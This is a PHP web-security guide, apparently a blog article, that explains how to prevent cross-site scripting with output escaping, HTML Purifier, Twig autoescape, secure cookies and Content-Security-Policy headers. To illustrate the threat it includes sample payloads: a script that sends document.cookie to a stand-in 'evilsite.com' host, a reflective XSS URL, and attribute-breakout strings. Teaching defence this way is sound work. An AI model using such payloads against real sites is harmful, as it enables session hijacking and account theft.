Cross-Site Scripting (abbreviated as XSS) is a class
of security vulnerability whereby an attacker manages to use a website
to deliver a potentially malicious JavaScript payload to an end user.
XSS vulnerabilities are
very common in web applications.
They're a special case of code injection attack; except where SQL
injection, local/remote file inclusion, and OS command injection target
the server, XSS exclusively targets the users of a website.
There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:
- Stored XSS occurs when data you submit to a website is
persisted (on disk or in RAM) across requests, usually with the goal of
executing when a privileged user accesses a particular web page.
- Reflective XSS occurs when a particular page can be
used to execute arbitrary code, but it does not persist the attack code
across multiple requests. Since an attacker needs to send a user to a
specially crafted URL for the code to run, reflective XSS usually
requires some social engineering to pull off.
Cross-Site Scripting vulnerabilities can be used by an attacker to
accomplish a long list of potential nefarious goals, including:
- Steal your session identifier so they can impersonate you and access the web application.
- Redirect you to a phishing page that gathers sensitive information.
- Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
- Perform tasks on your behalf (e.g. create a new administrator account with the attacker's credentials).
Cross-Site Scripting represents an asymmetry in the security
landscape. XSS vulnerabilities are incredibly easy for attackers to exploit, but XSS
mitigation can become a rabbit hole of complexity depending on your
project's requirements.
Brief XSS Mitigation Guide
- If your framework has a templating engine that offers automatic contextual filtering, use that.
- echo htmlspecialchars($string, ENT_QUOTES | ENT_HTML5, 'UTF-8'); is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML.
- If your requirements allow you to use Markdown instead of HTML, don't use HTML.
- If you need to allow some HTML and aren't using a templating engine (see the first item above), use HTML Purifier.
The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.
What Does an XSS Vulnerability Look Like?
XSS vulnerabilities can occur in any place where information which
can be altered by any user is included in the output of a webpage
without being properly escaped.
Example 1
<div id="profile"><?php echo $user['profile']; ?></div>
This is a potential stored XSS injection point (assuming the profile
field was pulled straight from the database without escaping). If a
malicious user is able to include a snippet that looks like this, they
can exploit any authenticated user that visits their profile and steal
their cookies for future impersonation efforts:
<script>
window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank");
</script>
Example 2
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
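The above snippet is vulnerable to reflective XSS attacks.
$_SERVER['PHP_SELF'] does not include the query string, but it does
include any extra path information that follows the script name. Just
trick a user into visiting
/form.php/%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
and they will see an alert box pop up containing the message 'XSS' when your page loads, because the form tag is rendered as:
<form action="/form.php/"><script>alert('XSS')</script>" method="post">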
Unlike
SQL Injection,
which prepared statements defeat 100% of the time, cross-site scripting
doesn't have an industry standard strategy for separating data from
instructions. You have to escape special characters to prevent attacks.
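As a rough sketch of what that escaping could look like for Example 2, the snippet below builds the same form tag but passes the value through htmlspecialchars() before printing it. The helper name formOpenTag() is hypothetical and exists only for this illustration; in a real page the argument would be $_SERVER['PHP_SELF'].

```php
<?php
// Hypothetical helper (not part of the article's code): builds the opening
// <form> tag from Example 2, escaping the action URL before output.
function formOpenTag(string $action): string
{
    $escaped = htmlspecialchars($action, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $escaped . '" method="post">';
}

// A crafted value that tries to close the action attribute early.
$malicious = '/form.php/"><script>alert(\'XSS\')</script>';
echo formOpenTag($malicious), "\n";
```

With the escaping in place, the quote and angle brackets are emitted as entities, so the payload stays inside the action attribute instead of becoming markup.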
The Quick and Dirty XSS Mitigation Technique for PHP Applications
The simplest and most effective way to prevent XSS attacks is the nuclear option:
Ruthlessly escape any character that can affect the structure of your document.
For best results, you want to use the built-in
htmlspecialchars()
function that PHP offers instead of playing with string escaping yourself.
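<?php
/**
 * Escape a string for output in HTML body text or a quoted attribute value.
 */
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

// Escape every untrusted value at the point where it is printed.
echo '<h2 title="', noHTML($title), '">', noHTML($articleTitle), '</h2>', "\n";
echo noHTML($some_data), "\n";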
The security of this construction depends on the presence of the
ENT_QUOTES flag when escaping HTML attribute values. It's important to
note that this prevents any HTML in $some_data from being rendered as
markup; it is displayed on the web page as literal text instead.
Why ENT_QUOTES | ENT_HTML5 and 'UTF-8'?
We specify ENT_QUOTES to tell htmlspecialchars() to escape quote
characters (" and '). This is helpful for situations such as:
<input type="text" name="field" value="<?php echo $escaped_value; ?>" />
If you fail to specify ENT_QUOTES, an attacker simply needs to pass
" onload="malicious javascript code
as a value to that form field and presto, instant client-side code execution.
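To make the difference concrete, the sketch below renders the same input field twice: once with ENT_NOQUOTES (no quote escaping at all, chosen here purely to show the failure) and once with ENT_QUOTES. The helper name renderField() is an assumption made for this illustration.

```php
<?php
// Illustrative helper: renders the input field from the text with the given
// htmlspecialchars() flags so the two outputs can be compared.
function renderField(string $value, int $flags): string
{
    $escaped = htmlspecialchars($value, $flags, 'UTF-8');
    return '<input type="text" name="field" value="' . $escaped . '" />';
}

$payload = '" onload="malicious javascript code';

// Quotes left alone: the payload closes the value attribute and adds its own.
echo renderField($payload, ENT_NOQUOTES | ENT_HTML5), "\n";

// Quotes escaped: the payload stays inside the value attribute as plain text.
echo renderField($payload, ENT_QUOTES | ENT_HTML5), "\n";
```

In the first line of output the browser sees a second attribute; in the second, every double quote from the payload has become &quot; and the element keeps a single value attribute.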
We specify ENT_HTML5 and 'UTF-8' so htmlspecialchars() knows what
character set and version of the HTML standard to work with.
The reason we need to specify both values is that, as demonstrated
against mysql_real_escape_string(), an incorrect (especially
attacker-controlled) character encoding can defeat string-based escaping strategies.
For the sake of safety and consistency, the encoding we specify here,
the encoding sent in the charset attribute of the <meta> tag, and the
charset added to the Content-Type HTTP header should all match.
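One way to keep those three values from drifting apart is to derive them all from a single constant. The following is only a sketch under that assumption; APP_CHARSET and the three helper names are invented for this example and are not part of PHP or of the code above.

```php
<?php
// One constant feeds all three places that must agree on the encoding.
// APP_CHARSET and the helper names are assumptions made for this sketch.
const APP_CHARSET = 'UTF-8';

// Value for the Content-Type HTTP response header.
function contentTypeHeader(): string
{
    return 'Content-Type: text/html; charset=' . APP_CHARSET;
}

// The <meta> tag to print inside <head>.
function metaCharsetTag(): string
{
    return '<meta charset="' . APP_CHARSET . '">';
}

// Escaping that uses the same encoding as the header and the <meta> tag.
function escapeForPage(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, APP_CHARSET);
}

// Typical use at the top of a page:
//   header(contentTypeHeader());
//   echo metaCharsetTag();
echo contentTypeHeader(), "\n", metaCharsetTag(), "\n", escapeForPage('<b>'), "\n";
```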
Important - Avoid Premature Optimization
Always escape data on output (when displaying to a user).
Do not escape user input against XSS attacks before inserting into a
database. WordPress made this mistake and eventually security researcher
Jouko Pynnönen of Klikki Oy realized
MySQL column truncation can defeat before-insert XSS prevention strategies.
You should still be
validating your input, however. If you're expecting an email address, make sure it's formatted like one.
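$email = filter_var($_POST['email'] ?? '', FILTER_VALIDATE_EMAIL);
if ($email === false) {
    // Not a well-formed email address: reject the request instead of storing it.
    http_response_code(400);
    exit('Invalid email address.');
}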
If you're using MySQL, make sure any value going into a TEXT field
fits within its 65,535-byte limit (just under 64 KiB). Unless strict SQL
mode is enabled, MySQL will silently truncate any value that exceeds
that length, which can cause both security issues (as WordPress
experienced) and data integrity issues.
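A length check before the insert is enough to rule out truncation. The sketch below assumes a plain TEXT column; the constant and the helper name fitsInTextColumn() are hypothetical names used only here.

```php
<?php
// Maximum byte length of a MySQL TEXT column (2^16 - 1).
const MYSQL_TEXT_MAX_BYTES = 65535;

// Hypothetical helper: returns true when $value can be stored in a TEXT
// column without being cut short. strlen() counts bytes, which is the
// unit the column limit is measured in.
function fitsInTextColumn(string $value): bool
{
    return strlen($value) <= MYSQL_TEXT_MAX_BYTES;
}

$body = str_repeat('a', 70000);
if (!fitsInTextColumn($body)) {
    echo "Rejected: body is too long to store safely.\n";
}
```

Rejecting the oversized value outright, rather than trimming it, keeps the stored copy identical to what the user submitted.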
The "escape all HTML entities" approach is secure and works
wonderfully for situations where users should not be providing their own
HTML markup. But what if you need to allow
some markup, while not opening the door for
any markup?
Put another way: How can we allow users to provide their own rich
text markup without allowing them to execute arbitrary JavaScript in
visitors' browsers?
Avoid HTML If You Can
An attractive solution is to adopt a rendering format such as BBCode,
Markdown, or ReStructuredText instead of allowing raw HTML. This allows
us to continue to reject all HTML entities while still allowing a
limited subset of markup options to make a user's contributions more
expressive and powerful.
If you can avoid accepting raw HTML by using another markup language such as Markdown,
please do so. If you can bolt a
WYSIWYG onto it for non-technical users, even better.
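The idea of rejecting all HTML while still allowing limited markup can be sketched with a tiny BBCode subset: escape everything first, then translate only the tags you choose to support. This is a minimal illustration, not a complete BBCode parser; renderBBCode() and the two supported tags are assumptions made for the example, and a maintained library would be the better choice for Markdown or full BBCode.

```php
<?php
// Hypothetical renderer for a two-tag BBCode subset: [b]...[/b], [i]...[/i].
function renderBBCode(string $input): string
{
    // Step 1: escape everything, so no user-supplied HTML survives.
    $escaped = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Step 2: translate the allowed tags into markup we generate ourselves.
    $rendered = preg_replace(
        ['#\[b\](.*?)\[/b\]#s', '#\[i\](.*?)\[/i\]#s'],
        ['<strong>$1</strong>', '<em>$1</em>'],
        $escaped
    );

    // preg_replace() returns null on a regex engine error; fall back to
    // the fully escaped text in that case.
    return $rendered ?? $escaped;
}

echo renderBBCode('[b]Hello[/b] <script>alert(1)</script>'), "\n";
```

Because the escaping happens before any tag is translated, the only HTML in the result is the markup the renderer itself emitted.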
An Order of HTML Please, Hold the XSS Payload
Although we can easily stop all XSS attacks by preventing any HTML
markup characters from breaking the document structure, this is often
not the desired outcome. For some use cases (blog comments, user
profiles, etc.) we want to allow our end users to be free to express
themselves, within reason. But at the same time, we don't want users to
be able to abuse this potential for customization to attack other users.
How can we resolve this conflict? Simple: Use a library such as
HTML Purifier. Most of the
clever XSS tricks hidden in the HTML specification are easily
defeated by HTMLPurifier, if used correctly.
How to Use HTMLPurifier to Stop XSS Attacks
Instead of attempting to naively search and replace malicious
snippets in a string of user input, HTML Purifier digests the entire
string as an HTML document, breaks it into tokens, and validates all
elements and attributes against a whitelist and the RFC definitions for
each attribute.
<?php
require_once '/path/to/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);
?>
<div id="profile"><?php
echo $htmlp->purify($user['profile']);
?></div>
Optimizing HTMLPurifier
Running HTML Purifier on every page load is a performance concern
that can be easily fixed by caching. When you insert data into your
database, keep the original values intact (e.g. for logging and threat
intelligence purposes), but also store a purified version and use the
purified HTML when displaying to end users.
This "store, purify, cache, serve from cache" strategy allows you to
enjoy the performance benefits developers normally get from filtering on
input, but without causing a permanent loss of data. It also allows you
to re-purify your original values in the event that you need to (e.g.
if HTML Purifier has a bug with HTML5 output and they release a new
version that fixes it).
$db->insert('blog_comments', [
'original_body' => $_POST['body'],
'rendered_body' => $htmlp->purify($_POST['body'])
]);
Important: When Not to Use HTML Purifier
HTML Purifier expects to operate in the context of an HTML document,
not a string within an HTML attribute. The library isn't psychic. It
cannot tell what the rest of the web page is doing immediately before
and after the untrusted string you invoke it on.
For example, even though it's using HTML Purifier, the following snippet is still
insecure:
<img src="user.php?username=<?php echo $htmlp->purify($_GET['username']); ?>" />
Simply pass the string
" onload="alert('XSS');
to
username
and you have client-side code execution.
When inserting any variables into another context, you should also run them through
htmlspecialchars()
(or
noHTML()
above) to ensure they don't break out and add extra attributes to the parent element.
This is safe:
<img src="user.php?username=<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />
This, too, is safe:
<?php echo $htmlp->purify("<img src=\"user.php?username=".$_GET['username']."\" />"); ?>
As it turns out,
context matters a lot for preventing cross-site scripting attacks.
What's secure in one context (e.g. HTML is allowed) could be disastrous
in other contexts (e.g. we're in the middle of an HTML attribute).
What About Other Contexts?
We've uncovered two rules for preventing XSS attacks so far:
- Always escape all HTML entities (i.e. with noHTML() defined above) when inserting data into an HTML attribute.
- Always purify (i.e. with HTML Purifier) when you wish to allow safe
HTML from the input string to appear in the rendered web page.
What do we do if we want to add a user-provided parameter to a
style
tag or attribute? What if we want to define a default value to a JavaScript variable?
Context-Sensitive HTML Escaping in Template Engines
Every context within an HTML document requires distinct escaping
rules that are not always relevant to other contexts. Fortunately,
there's an easy way to tackle all this complexity without a great deal
of effort or research:
Use templating libraries.
A popular PHP templating engine,
Twig, makes
contextual XSS filtering a walk in the park:
{% autoescape 'css' %}
<p style="color: {{ color|default('#0f0') }};">Test</p>
{% endautoescape %}
{% autoescape 'html' %}
{{ some_var }}
{{ not_user_provided|raw }}
<p class="{{ class|e('html_attr') }}">
<a href="/user/{{ username|e('url') }}">{{ username }}</a>
</p>
{% endautoescape %}
If you're using Twig, you should prefer wrapping entire sections in
{% autoescape %} blocks over applying |e
filters to every printed template variable. Not only does auto-escaping
make your code easier to read, but it prevents a single oversight from
becoming an entry point for an attacker with a malicious payload.
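When no template engine is available, the JavaScript-variable case raised earlier can be approximated in plain PHP with json_encode() and its JSON_HEX_* flags, which replace the characters that could otherwise end the script block or a string literal. The helper name jsLiteral() is hypothetical; treat this as a sketch for values placed inside a script element, not a general-purpose escaper for every JavaScript context.

```php
<?php
// Hypothetical helper for the "JavaScript variable" context: encodes a PHP
// value as a JSON literal that can be placed inside a <script> block.
function jsLiteral($value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// A value that tries to close the script element and open a new one.
$username = '</script><script>alert(1)</script>';
echo '<script>var username = ', jsLiteral($username), ';</script>', "\n";
```

The flags turn <, >, &, ' and " inside the value into \uXXXX escapes, so the browser's HTML parser never sees a closing script tag inside the literal.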
Browser-Level XSS Mitigation
There are a number of security features supported by all modern web
browsers that significantly reduce the impact of XSS vulnerabilities.
Even if you manage to escape every variable you output, it would be a
very good idea to use these features. We are going to focus on two:
HTTPS-Only Cookies (which means HTTP-Only cookies which only transmit over TLS) and
Content-Security-Policy headers.
Secure Cookies
Any time you set a cookie in PHP, you should set both httpOnly and
secure to true. (This assumes your website is only accessible over HTTPS, which it should be.)
Your session cookie, especially, should not be made available to
JavaScript. This can be achieved either by adding these lines to
php.ini, or by setting them manually on every request:
session.cookie_httponly = On
session.cookie_secure = On
Setting the session cookie parameters on every page load:
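session_set_cookie_params(
    0,                 // lifetime: expire when the browser closes
    '/',               // path
    '.yourdomain.com', // domain
    true,              // secure: only send over HTTPS
    true               // httponly: not readable from JavaScript
);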
session_start();
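On PHP 7.3 and later, session_set_cookie_params() also accepts a single array of named options, which makes it harder to mix up the two trailing booleans. The sketch below assumes that PHP version; secureSessionCookieParams() is a hypothetical helper name.

```php
<?php
// Hypothetical helper: returns the option array accepted by
// session_set_cookie_params() in PHP 7.3 and later.
function secureSessionCookieParams(string $domain): array
{
    return [
        'lifetime' => 0,       // expire when the browser closes
        'path'     => '/',
        'domain'   => $domain,
        'secure'   => true,    // only send over HTTPS
        'httponly' => true,    // not readable from JavaScript
    ];
}

// Typical use before any output is sent:
//   session_set_cookie_params(secureSessionCookieParams('.yourdomain.com'));
//   session_start();
print_r(secureSessionCookieParams('.yourdomain.com'));
```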
Content-Security-Policy headers
Content-Security-Policy headers significantly reduce the
risk and impact of XSS attacks in modern browsers by specifying a
whitelist in the HTTP response headers that dictates what the HTTP
response body can do. They don't protect against an attacker capable of
modifying the source files on the server, but most real-world XSS
vulnerabilities will fail to execute if these headers are used properly.
An example of a CSP header looks like this:
Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
HTML5 Rocks has a great
introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.
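For a sense of how such a header might be sent from PHP, here is a minimal sketch that builds a policy allowing same-origin scripts plus inline scripts that carry a per-response nonce. The helper name buildCspHeader() and the particular set of directives are assumptions chosen for illustration; a real policy depends on what your pages actually load.

```php
<?php
// Hypothetical helper: builds a Content-Security-Policy header line that
// allows same-origin scripts plus inline scripts carrying the given nonce.
function buildCspHeader(string $nonce): string
{
    $directives = [
        "script-src 'self' 'nonce-" . $nonce . "'",
        "object-src 'none'",
        'upgrade-insecure-requests',
    ];
    return 'Content-Security-Policy: ' . implode('; ', $directives);
}

// A fresh, unpredictable nonce should be generated for every response.
$nonce = base64_encode(random_bytes(16));

// Typical use before any output is sent:
//   header(buildCspHeader($nonce));
//   echo '<script nonce="' . $nonce . '">/* trusted inline script */</script>';
echo buildCspHeader($nonce), "\n";
```

An injected script element will not know the nonce for the current response, so a browser enforcing the policy refuses to run it.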
Paragon Initiative Enterprises' CSP Builder
Ever wanted to make
Content-Security-Policy
headers
easier to manage? Whether you'd rather just edit a JSON file than
remember the syntax of a CSP header, or if you'd rather build the
headers for a particular request programmatically (e.g. to use the
script-nonce feature), check out our MIT-licensed
CSP Builder project.
Summary
- Use
Content-Security-Policy
headers and HTTPS-only cookies.
- Your first line of defense against XSS attacks should be escaping any tainted information before inserting it into the DOM, not before storing it in a database.
- If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML.
- If you're using a templating engine such as Twig, use
{% autoescape %}
directives and |e
filters where appropriate. {% autoescape %}
should be prioritized over escaping every variable.
- If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on-hand.
- Otherwise, use
noHTML()
and leave nothing to chance.